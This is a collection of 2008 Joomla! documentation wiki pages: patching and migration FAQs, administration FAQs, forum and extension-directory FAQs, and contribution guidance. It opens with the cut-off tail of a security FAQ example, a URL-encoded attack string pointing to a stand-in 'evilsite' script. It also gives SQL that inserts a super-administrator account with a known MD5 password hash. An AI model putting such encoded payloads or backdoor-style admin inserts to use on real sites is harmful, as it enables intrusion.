%65%76il%73ite/%3F%65%76il%73
cript.%70l%22%29%29%3B</td>
</tr>
</table>

'''Resources'''

# [http://www.linkedresources.com/tools/unescaper_v0.2b1.html Text Unescape Utility]
# [http://www.w3schools.com/tags/ref_urlencode.asp HTML URL-encoding Reference]


[[Category:Security]]
<noinclude>[[Category:FAQ]]</noinclude>

Archived:Upgrading and Migrating FAQs version 1.0

2008-07-27T22:11:30Z

Igeoffi: add to faq category

{{review}}

===How do you patch Joomla! 1.0.x to 1.0.x?===
This is a small tutorial and FAQ how to patch Joomla! 1.0.x to a newer version 1.0.y. A discussion for praise and/or comments can be found here. This will ''not'' cover the upgrade from Joomla 1.0 to 1.5, only updates from 1.0.x to 1.0.x.

====What is a patch?====
A patch in Joomla! is a bunch of bugfixes, and might or might not include security issues. The patch announcement will always tell if a patch has fixed security issues. A patch is a minor upgrade. From Joomla! 1.0.0 to Joomla! 1.0.7 is considered a patch. Going from Joomla! 1.0,x to Joomla! 1.5 will be a major upgrade and should be treated differently.

====How do I know which version I use?====

Go to the administrator backend, and check the second line from the bottom, it will look something like this: 'Joomla! 1.0.x Stable [ Sunburst ] 15-Jan-2006 20:00 UTC'. The information that is available here, is pulled from /includes/version.php

====Should I patch or not?====

It is always advised to update to the latest version, especially if a patch has security fixes in it. When you experience no problems with Joomla!, and a patch doesn't contain security fixes, you do not have to patch to the latest version. Take care that if you jump more then one step to take a look at all the announcements. A patch for Joomla! 1.0.7, for example, doesn't contain the announcement for Joomla! 1.0.6. Whenever you experience problems, please search the forums first and try to patch your installation to the latest version.

====Do I need to install one or more patches to go to the latest version?====

When going from Joomla! 1.0.1 to Joomla! 1.0.x for example, you only need to install one patch. This patch will have a name like 'Joomla 1.0.1 to 1.0.x-Stable-Patch Package.zip'. Make sure that your current Joomla! version is the first number and that the version you are going to is the second number. Patches can be obtained here.

====Why do patch files have different extensions like .zip, .tar.gz, and .tar.bz?====

You only need one of those patches, the different extensions are for different operating systems. People using Windows will probably want to get the .zip files.

====Does a patch overwrite my configuration?====

No, the patch only overwrites files that are available in an official download. It doesn't overwrite configuration.php for example. There are a few things that you need to know.

A patch can overwrite the default language file /language/english.php. You only need to take care if you made changes to the default english.php. A Joomla! patch doesn't overwrite other language files you have put there yourself.

A patch can also overwrite /images/favicon.ico, for the people who use a favicon.ico and have overwritten this file.

A patch can overwrite files in the default templates that are available with a default Joomla installation. If you want to use a default template, please make sure that it is better to copy the default template to another folder under the /templates directory.

====When do I need to update my language file?====

You basically only need to update your language file if you are using another language than English. It is possible that patch contains a few additions in the default language file (/includes/english.php). If this is the case /includes/english.php will be available in the patch. Check your local international forum or the language forum for any updates that have taken place.

====What about the configuration.php-dist file?====

This file is only needed for people for which the installation wizard doesn't work when installaling Joomla for the first time. This file can be found in a patch, as sometimes there are new configuration settings. This file can be totally ignored when patching Joomla. The new configuration settings will be automatically added to your current configuration.php file.

====How do I patch Joomla! for a local installation?====

* Create a back-up of both data and database before starting!
* Check the [http://forum.joomla.org/ forum] if any problems have been found.
* [http://joomlacode.org/gf/project/joomla/frs/ Download the patch] in question.
* Unpack the patch in an empty folder. If Windows doesn't contain an application that can unzip/untar your patch, you can download the open source application [http://www.7-zip.org/ 7-zip]].
* It is highly advised to set your site offline for the duration of the patch. You can do this in the administrator backend, go to Global Configuration, and set 'Site offline' to 'Yes'.
* Select all files and folders in the patch, and copy them over the root directory of your local installation. This is the location where your configuration.php is available. After the copying is finished, the patch is finished.
* Set your site online again, your Joomla! installation should be patched to the latest version.
* Check the version in the administrator backend, the version should be changed.

====How do I patch for a Joomla! installation at a hoster?====

* Create a back-up of both data and database before starting!
* Check the forum if any problems have been found.
* Download the patch in question.
* Unpack the patch in an empty folder. If Windows doesn't contain an application that can unzip/untar your patch, you can download the open source application 7-zip from http://www.sourceforge.net.
* It is highly advised to set your site offline for the duration of the patch. You can do this in the administrator backend, go to Global Configuration, and set 'Site offline' to 'Yes'.
* You need a FTP program, FileZilla for example. This is an open source client that is available from http://www.sourceforge.net.
* Another FTP program will work as well. Another FTP program will work as well. For this application to work, you need an FTP account, with a corresponding password (obtained from your hoster).
::'''Open your FTP client, and make sure that you change the configuration so that 'Passive Mode' is on. Most FTP clients will have this option in its configuration.'''
* Select all files and folders in the FTP program, and copy them over the root directory of your installation at your host. This is the location where your configuration.php is available. After the copying is finished, the patch is finished. Check that all files have copied correctly. There are quite a few reports that files can get corrupted during transfer.
* Set your site online again, your Joomla! installation should be patched to the latest version. * Check the version in the administrator backend, the version should be changed.

===How do you move a Joomla! Site?===
Files and configuring of configuration.php

To move your Joomla site from either one folder to another or one server to another, here are a few basics.
* Copy over your files, either via ftp or SSH/command line
* Backup and then restore your database - perhaps using phpmyadmin or SSH/command line (this step only needed if moving site from one server to another.)

'''1.0'''
* Edit your configuration.php file to reflect the new values. Specifically the following:

<source lang="php">
$mosConfig_user = 'joomla_joomla';
$mosConfig_password = 'password';
$mosConfig_db = 'joomla_joomla';
$mosConfig_absolute_path = '/home/joomla/public_html';
$mosConfig_live_site = 'http://www.joomla.org';
$mosConfig_cachepath = '/your absolute path/cache';
</source>

:'''Note:''' You may also need to ensure you have configured your .htaccess file in the new location.

===How do I upgrade to Joomla! 1.5?===

Yes you can [[Migration|migrate]] a Joomla! 1.0.x site or a Mambo 4.5.x to Joomla! 1.5.

Joomla 1.5 does not provide an upgrade path from earlier versions. Converting an older site to a Joomla 1.5 site requires creation of a new empty site using Joomla 1.5 and then populating the new site with the content from the old site. This migration of content is not a one-to-one process and involves conversions and modifications to the content dump.

There are two ways to perform the migration:

* An automated method of [[Migration|migration]] has been provided which uses a migrator component to create the migration dump out of the old site (Mambo 4.5.x up to Joomla 1.0.x) and a smart import facility in the Joomla 1.5 Installation that performs required conversions and modifications during the installation process.
* Migration can be performed manually. This involves exporting the required tables, manually performing required conversions and modifications and then importing the content to the new site after it is installed.

====Automated migration====

This is a two phased process using two tools. The first tool is a [[Migration|migrator component]] named 'com_migrator'. This component has been contributed by Harald Baer and is based on his 'eBackup' component. The migrator needs to be installed on the old site and when activated it prepares the required export dump of the old site's data. The second tool is built into the Joomla 1.5 installation process. The exported content dump is loaded to the new site and all conversions and modification are performed 'on-the-fly'.

===What is a nightly build?===

The Joomla! developers work continually on improving Joomla! as they prepare new releases. Every day at midnight CET/CEST a package containing up to date revisions is created and is available for download.

====Where do I get the nightly build?====

Access to the nightly build is available through the Joomla! developer site.

====How do I install the nightly build?====

In most cases, you can unzip the package and overwrite your files. However, you should check the changelog file in case there has been a change to the database. This depends a lot on the stage in the development cycle of the release. Early on, pre-RC you can expect a lot of changes. After a stable release, there generally will not be changes.

====Should I use the nightly build?====

If you are willing to tolerate the risk of potential new problems, the nightly builds will give you solutions to old issues. However, nightly builds have not been through the quality testing that happens when there is a formal new release.

If you test a nightly build you can become an active part of the quality and testing process by posting any issues you find in the Q & T forum for 1.0.x and 1.5.

====What's the difference between a nightly build and subversion?====

The nightly build pulls what is in subversion once a day.

<noinclude>[[Category:FAQ]]</noinclude>

Archived:Administration FAQs Version 1.0

2008-07-27T22:11:00Z

Igeoffi: add to faq category

=== Why don't all of my menu items show up in the module assignment lists?===

'''1.0.'''

Modules are assigned to specific pages using a list of menu links that is visible when you edit the module in the module manager (on the right of the page). In older versions of Joomla! this list does NOT include menu links of the type "URL."
This is an anomaly from the history of the development of Joomla! carried over from Mambo. Although you can use the URL type for any link, including internal Joomla! links, the original idea was that these would be used for links to external sites which would not display Joomla! modules.
Some Joomla! component extensions use URL links (rather than component links with parameters) as a simple way to access specific views of the components.

'''In Joomla! 1.0.12 and later this issue was partially addressed by allowing modules to be assigned to URL links that did not include ItemId. Therefore, one way to address this issue is to make sure that your site is running the current version of Joomla! and that URL links that are internal to your site do not include ItemId values. '''

=== How do I redirect users after a successful login?===

After logging into the Administration backend, go the module manager. A list of all the modules installed on your site will appear. Edit the one that says "Login Form" under Module Name ("mod_login" under the Type column).

'''1.0.x'''

Under Parameters, enter the URL of page where you want to redirect successful logins to where it says "Login Redirection URL."

'''1.5'''

Select the redirection page from the list of menu links offered. Make sure that the link is to a published item.

Note: The same procedure is used for redirecting users on successful logout except you enter the page where you want to redirect successful logouts to where it says "Logout Redirection URL."

Also for '''1.5'''
If you would like to override the default login specified in your Administration back end from your custom code you can do so with the following:
<nowiki> 1. take the url that you would like to redirect the user to after they have successfully
logged in and apply the 'base64_encode' function to it. i.e.
$redirectUrl = '''base64_encode'''($redirectUrl);
// a base64_encode of 'index.php?option=com_pizzapie' yeilds: 'aW5kZXgucGhwP29wdGlvbj1jb21fcGl6emFwaWU='

2. prepend the '&return=' query string to your newly encoded $redirectUrl:
$redirectUrl = ''''&return=''''.$redirectUrl;

3. append that $redirecturl to the Joomla Login Url...
$joomlaLoginUrl = 'index.php?option=com_user&view=login';
$finalUrl = $joomlaLoginUrl . $redirecturl;
</nowiki>
when you display that $finalUrl, it should look something like this:
'index.php?option=com_user&view=login'''&return=aW5kZXgucGhwP29wdGlvbj1jb21fcGl6emFwaWU=''''

The '''controller.php''' file in the '''com_user''' checks the contents of the 'return' in the JRequest object (the Joomla query access object). If it is set and in the base64 format, it base64_decode(s) it and applies that redirection.
--[[User:Magneticmg|Magneticmg]] 09:17, 11 June 2008 (EDT)

=== What do the types of links for menus mean?===

''' VERSION 1.0'''

When you create a new link on a menu you need to select from a number of different types of links. Which type you select depends on what you are linking to and how you want it to appear. The following types exist:

'''Content'''

These types allow you to link to a section, a category or individual content items, static content and archives. Sections and categories can be linked either blog style or list/table style. In addition there is a link type that allows submission to specific content sections.

'''Miscellaneous'''

Separator/placeholder allows you to insert a non active link.

Wrapper creates an Iframe which displays an external page within your Joomla! site.

'''Submit'''

Submit--Content allows you to link to a form to submit content to specific sections.

'''Components'''

Component links allow you to link to components you have installed or that are preinstalled in Joomla!. In some instances components will allow you to set parameters to define the display in more detail.
There are also some predefined links to components that are included with Joomla! by default, such as weblinks and contacts.

'''Links'''

Links include specific kinds of links, most of which are also included under other headings. URL link is a generic link that allows you to link any specific url, either internal to Joomla! or externally.

'''VERSION 1.5'''

'''Articles'''

This gives you access to content.

You can then choose from section, category, archive, articles, front page.

Within section, category and archive you can choose list or blog layouts.

'''Blog Layout'''

Blog layout will show a listing of all Articles of the selected blog type (Section or Category) in the mainbody position of your template.

'''List Layout'''

Table layout will simply give you a tabular list of all the titles in that particular Section or Category.

'''Wrapper'''

Wrappers allow you to place stand alone applications and Third Party Web sites inside your Joomla! site. The content within a Wrapper appears within the primary content area defined by the "mainbody" tag and allows you to display their content as a part of your own site. A Wrapper will place an IFRAME into the content Section of your Web site and wrap your standard template navigation around it so it appears in the same way an Article would.

'''Each Component'''

Each component will have its own link. Some may require you to make additional choices of options.

'''External Link'''

Lets you link to an external site. There may be occasions where you also want to point to a link directly to a apage on your site.

'''Separator'''

This lets you make a text or image only (non-linkable) menu item.

'''Alias'''

Lets you make a link matching an existing menu item. This avoids the problem of having multiple URLs pointing to the same content.

=== How do I get rid of "This Category is Currently Empty"?===
'''1.0'''

When you make a content category table link to an empty category, by default a "This Category is Currently Empty" message will display (or the equivalent in another language). You can eliminate or modify this message by editing your language file.

In /language/english.php change line 113 from
define('_EMPTY_CATEGORY', 'This Category is currently empty');
to
define('_EMPTY_CATEGORY', <nowiki>''</nowiki>);

You can also change the text in the menu link to weblinks.

=== How do I add a link to a menu?===

To add a new item to an exisiting menu, you must log in to the administrative interface (back end) of Joomla!

* Go to the menu manager (Menu>>Menu Manager).

* Find the menu you wish to add to and click on the icon in the Menu Items column.

This will give a list of existing menu items.

* To create a new item, click on the New icon.

'''1.0.x'''

* Select the type of link you want.

* Click on the continue icon.

* Fill in or select the appropriate information and parameters.

* Save.

Note: For some component links you need to edit the new link in order to apply parameters.

compat_15_native.png

'''1.5'''

* Select the menu item you want from the list displayed.

* Continue making selections until you have reached the end of the choice tree for your menu link type.

=== What is php defined( '_VALID_MOS' ) or die( 'Restricted access' ) or defined('_JEXEC') or die('Restricted access')?===

'''1.0'''
Most php files within Joomla! 1.0.x begin with the following statement:

defined( '_VALID_MOS' ) or die( 'Restricted access' )

This statement checks to see if the file is being called from within a Joomla! session. This protects your site by making it more difficult for a cracker/hacker to damage your site.

However, this line should NOT be included in your main index.php file, since this is the program that starts the Joomla! session.

'''1.5'''

Most PHP files within Joomla! 1.5 begin with the following statement:

defined('_JEXEC') or die('Restricted access');

This statement checks to see if the file is being called from within a Joomla! session. This protects your site by making it more difficult for a cracker/hacker to damage your site.

However, this line should NOT be included in your main index.php file, since this is the program that starts the Joomla! session.

=== How do I stop users from being able to register?===

Go to your site >> global configuration and change "allow user registration" to no.

=== How do I control whether modules are vertically or horizontally arranged?===

'''1.0'''

If you edit the html of your template, you will see that each position is assigned to a location using mosLoadModules.

Usually it looks something like this:

<?php if (mosCountModules('top')>0) mosLoadModules ( "top" ); ?>

By default, modules are arranged in a vertical list. However, you can control this by changing the line. For example, to make a horizontal layout use
<?php if (mosCountModules('top')>0) mosLoadModules ( "top", 1 ); ?>

For vertical
<?php if (mosCountModules('top')>0) mosLoadModules ( "top", 0 ); ?>

Here are the definitions of the numbers for mosLoadModules:
1 = horizontal, 0 = normal, -1 = raw, -2 = XHTML and -3 = extra divs.

'''1.5'''

See [[jdoc statements]]

The optional style="" attribute is available for the module and modules types of <jdoc:include /> statements. The attribute value refers to the "chrome" style used to wrap the output generated by a module. If no style is provided, a value of "none" is used by default. The standard styles which are declared in <tt>/templates/system/html/modules.php</tt> include:

* table
* horz
* xhtml
* rounded
* outline

Template designers may add additional chrome names by adding a custom version of this file to <tt>/user-template/html/modules.php</tt>.

=== How do you display an RSS feed?===

The easiest way to display an RSS feed is:

In administrator,

'''1.0'''
* go to modules>>site modules
* Click new.
* Give it a title
* Scroll down and put the link for the rss feed where it says RSS URL
* Set your details.
* Then display your feed as you would any module.

'''1.5'''
* Go to extensions>>Module Manager
* Find the Feed Display module
* Enter the URL of the feed.
* Save and display the module like any other module.

'''Both'''
A second way is to use the News Feeds component that comes with Joomla!
* In the administrator go to components>>News Feeds
* In the component you can manage your news feeds and assign them to categories.
* To show the feeds on the front end make a component link in your menu.

=== How do I assign a module to a position?===

You assign a module to a position using the module manager.

'''1.0'''

Modules>>Site Modules

On the left side of the page, on the third line, there is a drop down menu that lets you select the position.
Modules that are not published will not display.

Modules can be assigned to unused positions (positions not in the template) if you want to have them published but not displayed in a position (for example, if you want to display a module in content).

Multiple modules may be assigned to the same position. They will be displayed in the order shown for modules in that position in the module manager.

If you want to display a module in more than one position, use the module manager to copy the module and assign the copy to the second position.

'''1.5'''

Extensions>>Module Manager.

(Note: all available modules show up under this Module Manager, even though some of them are built into Joomla! and are not extensions.)

On the left side of the page, on the third line, there is a menu that lets you select the position. You also can create a new position name on the fly but typing it in the same space as the menu. (In that case, make sure the same position name also appears in the template file.)

Modules that are not published will not display.

Modules can be assigned to unused positions (positions not available in the template) if you want to have them published but not displayed in a position (for example, if you want to display a module in content).

Multiple modules may be assigned to the same position. They will be displayed in the order shown for modules in that position in the module manager.

If you want to display a module in more than one position, use the module manager new icon to create an additional copy and assign that copy to the second position.

=== How do you put modules in or remove them from specific pages?===

Modules are assigned to "pages" using the module manager. In the administrator (back end) go to

'''1.0'''
Module>>Site Modules of

'''1.5'''
Extensions>>Module Manager

Select the module you want to assign and edit it.

'''1.0'''

On the right you will see a list with a heading Pages/Items.

At the top of the list, you can pick all, none or unassigned to make an assignment for the entire site.

Underneath this list, there is a list of all the menu links in your site except those that are of type URL.
Using this list you can select individual pages on which your module will or will not appear.

'''1.5'''

On the left there is a list of menu items. You can chose between None, All and Select Menu Item(s) from the List.
To assign to some but not all pages choose the third option and select the menu links that you want the module associated with.

'''Notes:'''
If your module is assigned to a position that does not exist in the template used to display a page, the module will not appear even if it is assigned to a specific page.

If your module is not published/enabled it will not appear even if assigned to a page.

You cannot assign a module to a URL link. This is because URL links do not have Itemids assigned to them. You also cannot assign modules to pages that are only linked via content or other, non-menu modules, because these also do not have Itemids.

One work-around for this problem is to have an unpublished menu that contains links to the items you wish to link through non-menus. This will create an itemid that can be included in the url you link to. You will see a list with a heading Pages/Items.

At the top of the list, you can pick all, none or unassigned to make an assignment for the entire site.

Underneath this list, there is a list of all the menu links in your site except those that are of type URL.
Using this list you can select individual pages on which your module will or will not appear.

Notes:
If your module is assigned to a position that does not exist in the template used to display a page, the module will not appear even if it is assigned to a specific page.

If your module is not published it will not appear even if assigned to a page.

You cannot assign a module to a URL link. This is because URL links do not have Itemids assigned to them. You also cannot assign modules to pages that are only linked via content or other, non-menu modules, because these also do not have Itemids.

One work-around for this problem is to have an unpublished menu that contains links to the items you wish to link through non-menus. This will create an Itemid that can be included in the URL you link to.

=== How do you change the title of a module?===

From the adminisrator (backend) go to the module manager ('''1.0''' Modules>Site Modules '''1.5''' Extensions>Module Manager).
Find the module you want to change and click on its name.
Change the name and save.

=== Can I control what is shown in the Latest News Module?===

Waiting for licensing

=== What does This site is temporarily unavailable - Database ERROR NUMBER CODE mean===

waiting for licensing

=== Why are the admin menus not working or missing?===

waiting for licensing

=== How do I change the footer?===
=== How do I add my own php to a content item?===

'''1.0'''
You can either create your own joomla component or else install a mambot, such as kl_php or moslate.

Another option is to use the wrapper menu item, so you can add your own custom made php files.

=== How do I recover my admin password?===

'''1.0'''

If you know the email address that was used, the simplest thing is to do is to use the "lost password" Front-end function if you have made it available.

If not, you will need access to the MySQL database.

You have two choices, either add a new super administrator or change the password stored in the data base.
To do this you need to go to phpMyAdmin (or use a similar tool) and manually edit the database. Before doing this ''back up our complete database''.

Run this to create a new user known as <var>admin2</var>.

<source lang="sql">
INSERT INTO `jos_users` VALUES
(62, 'Administrator2', 'admin2', 'your-email@email.com', '21232f297a57a5a743894a0e4a801fc3',
'Super Administrator', 0, 1, 25, '2005-09-28 00:00:00', '2005-09-28 00:00:00', '', '');
INSERT INTO `jos_core_acl_aro` VALUES (10,'users','62',0,'Administrator2',0);
INSERT INTO `jos_core_acl_groups_aro_map` VALUES (25,'',10);
</source>

The password will be <var>admin</var>. Immediately log in and change this password.

Or

You can change the password in the table for your admin user (assuming you never changed the user name; if you have just change the instructions below to .

The password is stored in the MySQL database jos_users table password field. (change this for your table prefix if different)

Open the table, find your admin username, and then select that row for editing.

The password must be hashed, you cannot simply enter text into this field.

Set the password to a known value

<pre>
- password = "this is the MD5 hashed password"
------------------------------------------------------
- admin = 21232f297a57a5a743894a0e4a801fc3
- secret = 5ebe2294ecd0e0f08eab7690d2a6ee69
- OU812 = 7441de5382cf4fecbaa9a8c538e76783
</pre>

Paste the hashed password into the field, save the change, and log-in using the new password.
Immediately change your password to something more secure!

=== How do I implement the core Search Engine Friendly URLs (SEF) on a Windows Server?===

'''1.0'''

Many Joomla! Community members are using ther local Windows based PC's to test and develop Joomla! sites on and one of the most frustrating items about Apache on Windows is that Winodws cannot support many of the Apache functions that can be used on Linux/Unix based production sites.

Joomla! SEF Capability on Windows/Apache

1 ) Ensure that you have the Apache Rewrite Module ( mod_rewrite.so ) installed/available in the Apache " modules/ " directory.

2 ) Enable Apache " mod_rewrite " in httpd.conf by removing the " # " ( hash sign ) from the following line in httpd.conf

# Remove the "#" if it exists from the following line in the modules section
LoadModule rewrite_module modules/mod_rewrite.so

3 ) Restart Apache to check that the ReWrite Module is loading correctly and not crashing Apache
apache -k restart

4 ) Again, modify the following lines in your httpd.conf to support Windows File Naming conventions
<pre>
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives. See also the AllowOverride
# directive.
#
#AccessFileName .htaccess
# Allows for Joomla! SEF functionality on Windows (Notice, No dot)
AccessFileName htaccess
#
# The following lines prevent .htaccess and .htpasswd files from being viewed by Web clients.
#
#<FilesMatch "^\.ht">
# Allows for Joomla! SEF functionality on Windows (Notice, No dot)
<FilesMatch "^\ht">
Order allow,deny
Deny from all
Satisfy All
</FilesMatch>
</pre>

3 ) Restart Apache to check that the FileMatch Rule is not in error and not crashing Apache
apache -k restart

6 ) Rename htaccess.txt to " htaccess " (notice, no "dot", unlike the *nix equivalent)

7 ) Modify $mosConfig_sef = 0 to now be a 1 (turning on SEF)

8 ) Access you local WebSite and check your SEF is working.

=== Can I import users from a CSV file?===

There is not a native bulk import function. However, users can be imported using MySQL. If importing, make sure that each user must have a record in the following tables: jos_users jos_core_acl_aro jos_core_acl_groups_aro_map (assuming that jos is your prefix) Passwords should be encrypted, i.e. in Joomla! 1.0.x md5(password).

=== Why does the html disappear when I edit in my wysiwyg editor?===

Many of the wysiwyg editors strip all but a limited number of html tags. The list of tags is often configurable. This is to prevent potential problems on your site. You can overcome this limitation by selecting "no WYSIWYG" as your editor (in the user manager or your profile).

Some editors will also allow you to specify which html tags are allowed.

=== Will my existing extensions work in Joomla! 1.5?===

There is a legacy system in place that MAY allow extensions that are not 1.5 compatible to continue to operate. However, we strongly recommend that you update to the current version of all extensions prior to migration and that you check each extension's home page for specific recommendations about migration for that extension.

It is very wise to use a staging server or test server to try out extensions before deploying them on a production server.

There is no guarantee that all extensions will work.

=== What do I do to prepare to upgrade?===

Prior to migrating a site it is absolutely essential that your database and all files be backed up . It is recommended that you migrate on a copy of your database while leaving your existing site in operation. Once you are satisfied that your 1.5 site is working as expected, you can switch to the new site. If this is not possible because your host limits the number of databases you have available, you can still install the 1.5 files in a new folder. In this situation, you should use the global settings on your old site to take the site offline while you make the transition.

To make a backup of your site, you must backup both the files and the database. There are several extensions which can help with this or you can use the options offered by your host. Ask your host for instructions on how to do a backup if you are unsure.

=== How do I implement the core Search Engine Friendly URLs (SEF)?===

'''1.5'''

#Rename htaccess.txt to .htaccess
#In Global configuration, select yes to all three SEF options.
#Make sure that Mod_rewrite is working.

===How do I block or delete a superadministrator?===

'''1.5'''

First, demote to superadministrator to a lower category, such as registered. Then delete or block.

===How do I organize my frontpage with appropriate columns, etc.===

If you're just getting started, take a look at the [[Absolute Beginners Guide to Joomla!]]. There are a great many conceptual ideas there that you need to understand.

'''1.5'''

There are five parts to setting up your frontpage.

'''''First:'''''

Choose a desirable template for your site. Install it, and get it basically working. The template determines the column layout for your site.

'''''Second:'''''

Choose and configure your modules, so your frontpage displays the right menus, etc. Modules are those things like menus, login forms, banner-ad positions, "Breaking News" boxes, etc., that show up on the pages of your site.

Use Extensions/Module Manager in your backend menu to do this. Edit each module in turn to place it in the correct spot on your template (for example, right, left, breadcrumb, etc.)

You can disable the modules you don't want to see, enable the ones you do, position them within your template, and control their order from the Module Manager.

When you're doing this, make sure you have not enabled caching. If caching is enabled, it may look like your changes are not taking effect, which can drive you crazy.

Use the Preview button on the backend (upper right), and Shift-Reload on your browser, liberally to make sure you have things right. Change one thing in the backend, then view the frontpage again.

Note well: all modules in 1.5 are controlled from Extensions / Module Manager, even the ones that aren't really extensions.

'''''Third:'''''

Make sure your frontpage is configured so that the front page manager can control the order of articles in your front page. You need to [[Setting_Front_Page_Advanced_Parameters|set certain advanced parameters correctly]].

'''''Fourth:'''''

Use the Content Manager to enable certain articles to be published on the frontpage. Only enable the ones you want on the frontpage.

'''''Fifth:'''''

Use the Front Page manager to set the order of articles on your frontpage.

<noinclude>[[Category:FAQ]]</noinclude>

Joomla! Extension Directory FAQs

2008-07-27T22:08:32Z

Igeoffi: {{review}}

Joomla! Forum FAQs

2008-07-27T22:08:22Z

Igeoffi: {{review}}

Joomla! Extension Directory FAQs

2008-07-27T22:00:02Z

Igeoffi: /* =How can I help the extension submission process? */

===How do I list my extension in the extensions site?===
Information on how to list extensions in the extensions site is available here:
http://extensions.joomla.org/content/view/15/63/

===What extension is used to manage extensions.joomla.org?===
It is a customized version of Mosets Tree (a commercial component you can find in the Joomla! Extensions Directory ).

===Why was my extension rejected from being listed?===
Some of the common reasons extensions are rejected are because of:
*logo violations
*extension cannot be downloaded or found on the site
*extension does not install

===How can I help the extension submission process?===
There are several ways you can help the extension submission process go faster and smoother.
As you may know, the Joomla! Extension Directory is supported by volunteers and it takes time to go through all the extensions.
To make things easier:
*Make sure your download link leads directly to the download page. It makes downloading and testing the extension a whole lot easier.
*Make sure a front-end/public/guest user can actually download the extension.
*Test your extension to make sure the package can be installed.
*If you have use the Joomla! logo anywhere, make sure it follows the logo guidelines.
*If you need to make changes to your extension listing and it has not been published, do not submit another application. Removing duplicates takes up precious time. Instead, either email your changes to team@extensions.joomla.org with detailed information about your extension or wait until your extension is published.

===Why was my review of XYZ extension removed and/or edited?===
*Spam and/or self-promotion.
*Feature requests. Send feature requests to the developer.
*Support requests. Send support requests to the developer.
*You state that you haven't used the extension.
*Putting some type of code. The review section doesn't like code languages.

Joomla! Extension Directory FAQs

2008-07-27T21:59:50Z

Igeoffi: add more faqs

===How do I list my extension in the extensions site?===
Information on how to list extensions in the extensions site is available here:
http://extensions.joomla.org/content/view/15/63/

===What extension is used to manage extensions.joomla.org?===
It is a customized version of Mosets Tree (a commercial component you can find in the Joomla! Extensions Directory ).

===Why was my extension rejected from being listed?===
Some of the common reasons extensions are rejected are because of:
*logo violations
*extension cannot be downloaded or found on the site
*extension does not install

===How can I help the extension submission process?==
There are several ways you can help the extension submission process go faster and smoother.
As you may know, the Joomla! Extension Directory is supported by volunteers and it takes time to go through all the extensions.
To make things easier:
*Make sure your download link leads directly to the download page. It makes downloading and testing the extension a whole lot easier.
*Make sure a front-end/public/guest user can actually download the extension.
*Test your extension to make sure the package can be installed.
*If you have use the Joomla! logo anywhere, make sure it follows the logo guidelines.
*If you need to make changes to your extension listing and it has not been published, do not submit another application. Removing duplicates takes up precious time. Instead, either email your changes to team@extensions.joomla.org with detailed information about your extension or wait until your extension is published.

===Why was my review of XYZ extension removed and/or edited?===
*Spam and/or self-promotion.
*Feature requests. Send feature requests to the developer.
*Support requests. Send support requests to the developer.
*You state that you haven't used the extension.
*Putting some type of code. The review section doesn't like code languages.

Joomla! Extension Directory FAQs

2008-07-27T21:44:52Z

Igeoffi: content moved from joomla cms project faqs

Joomla! Forum FAQs

2008-07-27T21:42:54Z

Igeoffi: content moved from joomla cms project faqs

===What forum is used at joomla.org?===

We are currently using the forum software, phpBB3. phpBB is located here: http://www.phpbb.com/

===How is the forum at joomla.org integrated with Joomla!?===
The forum is not bridged with Joomla! in any way. The forum uses a customized theme that matches the rest of the joomla.org sites.

===What are the rules of the joomla.org forums?===
You can read the current forum rules here: http://forum.joomla.org/viewtopic.php?f=8&t=65

===How do you empty your PM-box on the forum?===

Problem
Your PM-box is full and nobody can send you anymore messages. How to solve this?

Solution
go to your messages and "check" the box and click delete for those you want to delete.

Note: READ them first before you delete them!

===How do I search the forum to find what I need?===

The forum search is somewhat tricky. Here are some tips for effective searching:

#Searches are case sensitive, so try upper and lower case. For example, xml and XML will give different results.
#Searches are for whole words, so for example error and errors will give different results.The forums are spidered by external search engines so you may be more successful using one of these.
#Advanced search will let you search with more parameters.

FAQs

2008-07-27T21:41:26Z

Igeoffi: reorder, add forum faqs, jed faqs link

Joomla! Frequently Asked Questions (and their answers).

* [[Starting with Joomla! FAQs]]
* [[Installation FAQs]]
* [[Administration FAQs]]
* [[Upgrading and Migrating FAQs]]
* [[Security and Performance FAQs]]
* [[Template FAQs]]
* [[Joomla! 1.0 Specific FAQs]]
* [[Joomla! 1.5 Specific FAQs]]
* [[Troubleshooting 1.5 FAQs]]
* [[Joomla! CMS project FAQs]]
* [[Joomla! Forum FAQs]]
* [[Joomla! Extension Directory FAQs]]
* [[JoomlaCode FAQs]]
* [[JEDL/FAQ|JEDL FAQ]]

<noinclude>[[Category:Landing Pages]]</noinclude>
<noinclude>[[Category:FAQ]]</noinclude>

How to contribute

2008-05-31T17:42:37Z

Igeoffi: add forum support boards

There are many ways you can contribute to the Joomla! project. Even if you are not a developer, no matter what your skills, there is always some way you can help the project. Here are some suggestions to get you started:
; Code
: If you are a developer then the best way to get started is to fix bugs and submit patches. Contact [mailto:wilco.jansen@joomla.org Wilco Jansen] who will point you in the right direction.

; Documentation
: The English documentation is maintained on this wiki and you only need to [http://docs.joomla.org/Special:Userlogin register] to be automatically granted write access. A good place to start is the [[Cookie jar]].

; Forum Support Boards
: The [http://forum.joomla.org/viewforum.php?f=513 Joomla! User Support] boards on the forum is a great place to help other users out who are experiencing difficulty. There's plenty of questions to go around and help is always needed.

; Testing
: You don't need to be a developer to get involved in the development of Joomla! We need people to test the code and report bugs or other issues. Any user can get involved in this process. Contact the Joomla! [[Bug Squad]] if you'd like to get involved.

; Translations
: To help with language packs, or translations of the help screens or other documentation, then contact your local translation team. If there is currently no translation for you language then please consider starting one. Contact [mailto:ole.ottosen@joomla.org Ole Ottosen] who will help you to get started.

; Events
: There are regular local Joomla! events in many countries but if there isn't one in your country then why not organise one? Contact [mailto:alex.kempkens@joomla.org Alex Kempkens] is you'd like to do this. If there is already a Joomla! event, such as a Joomla!Day, being organised, then why not see if you can help out? Contact the event organiser, or ask [mailto:alex.kempkens@joomla.org Alex Kempkens] to put you in touch with the organisers. A good way to start is to offer to assist with the event on the day as organisers are often looking for people who will help keep things running smoothly.

; Sites
: We are always looking for people who can help us maintain various aspects of our official websites. Contact one of the Joomla! project managers if you'd like to get involved with this work.

; Donations
: Time is our most precious commodity, so contributing your time is usually the most valuable thing you can do, but monetary donations are also welcome! Donations help us with infrastructure costs and enable us to help with community events. Contact [mailto:michelle.bisson@joomla.org Michelle Bisson] if you'd like to donate a large sum, but smaller sums can be donated using this link in the top right corner of most of our websites.

; Buy something from our shop
: We have a range of merchandise available, including many useful Joomla! books. The Joomla! project receives a proportion of the sale price when you buy through our [http://shop.joomla.org shop].

User:Igeoffi

2008-04-12T21:53:51Z

Igeoffi: New page: On the J! Forum: http://forum.joomla.org/memberlist.php?mode=viewprofile&u=32483

